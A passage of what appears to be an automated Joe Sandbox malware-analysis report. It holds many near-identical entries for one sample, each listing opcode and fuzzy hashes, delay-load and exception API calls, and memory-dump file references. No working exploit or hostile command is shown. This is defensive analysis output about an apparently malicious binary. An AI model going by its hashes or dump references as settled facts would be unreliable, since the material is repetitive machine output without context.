                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 63774de1bd9618fae3a91887aede0b33719fc8b3f4511d764a798c823b46ff3c
                                                                                                                    • Instruction ID: 1b79905301205a18dc0698b488b6937f919d00c1c0d760aaade72fbeb0714424
                                                                                                                    • Opcode Fuzzy Hash: 63774de1bd9618fae3a91887aede0b33719fc8b3f4511d764a798c823b46ff3c
                                                                                                                    • Instruction Fuzzy Hash: 8CB092E26589807C320C5158D802D3B0208C382B12320822EB888C4081A8441E480435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 6ca248fb4f0df660a1fd1215b98e5ca4727041aa2c6f73222b5c31db6b48b8cf
                                                                                                                    • Instruction ID: 93c21cde02683ced3d54c99ebb5b1e4bc6ed49fba0eeec287ae34cb81381e6d2
                                                                                                                    • Opcode Fuzzy Hash: 6ca248fb4f0df660a1fd1215b98e5ca4727041aa2c6f73222b5c31db6b48b8cf
                                                                                                                    • Instruction Fuzzy Hash: 9FB012D16581807D310C5194DC02C3B024CC3C1B12330802FFC4CC5081FC441E080535
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 35cb9e20657a0939fc492e9f8e7a969808f4c03ff569fb270c2d917625ee9e41
                                                                                                                    • Instruction ID: 7b143f9bd3e6676075e51d7b016e23e0bb2b9702cf1e8393b3f5b1828ebfb533
                                                                                                                    • Opcode Fuzzy Hash: 35cb9e20657a0939fc492e9f8e7a969808f4c03ff569fb270c2d917625ee9e41
                                                                                                                    • Instruction Fuzzy Hash: E9B012D17581807C310C5194DD03C3B025CC3C1B12330822FFC4CC5081FC441F090835
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 482e1fe546951322c5459eb004610fe86d6b44b36b4735347cc897874828d205
                                                                                                                    • Instruction ID: f2b3960374cefa1ff81fe425005b774ca7bc4288cb1dcae59f04480292ca6ce0
                                                                                                                    • Opcode Fuzzy Hash: 482e1fe546951322c5459eb004610fe86d6b44b36b4735347cc897874828d205
                                                                                                                    • Instruction Fuzzy Hash: 0DB012D16582807C314C5194DC03C3B025CC3C1B12330822FFC4CC5081FC441E480835
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b525577d174261c6cc351903245c4e7b1fa6a35e4817037d24e8caeb07da2240
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: b525577d174261c6cc351903245c4e7b1fa6a35e4817037d24e8caeb07da2240
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 5f1715ae5bd72f391c912fdface4cf525c63dbab977fb645272f7e73f961e709
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: 5f1715ae5bd72f391c912fdface4cf525c63dbab977fb645272f7e73f961e709
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a84215411cc1e653e104e70c6c5aafd08d02d63c1f8b6c800f1c549373e1df08
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: a84215411cc1e653e104e70c6c5aafd08d02d63c1f8b6c800f1c549373e1df08
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d5bba3be7106c6eb6da4d66a88c6d3cf75e322b4ec456343fc47494ede7ca58a
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: d5bba3be7106c6eb6da4d66a88c6d3cf75e322b4ec456343fc47494ede7ca58a
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: e415a9c2b37bde7abac96c527aa35f74172d4f9b2f3ddd3c9d59cdd28e04603f
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: e415a9c2b37bde7abac96c527aa35f74172d4f9b2f3ddd3c9d59cdd28e04603f
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: fe8481ce534ebe9f94db749e2e092309184b28d1944729c4a06e6d2ed744ce66
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: fe8481ce534ebe9f94db749e2e092309184b28d1944729c4a06e6d2ed744ce66
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: fe16b7f56f8d014e88279fda0f97a11e8a8539e89ad447241b2f8dfe99a1e015
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: fe16b7f56f8d014e88279fda0f97a11e8a8539e89ad447241b2f8dfe99a1e015
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: bfedae649512002442ede6447758be1861e269e26528fe640bdf4e0f88abd624
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: bfedae649512002442ede6447758be1861e269e26528fe640bdf4e0f88abd624
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
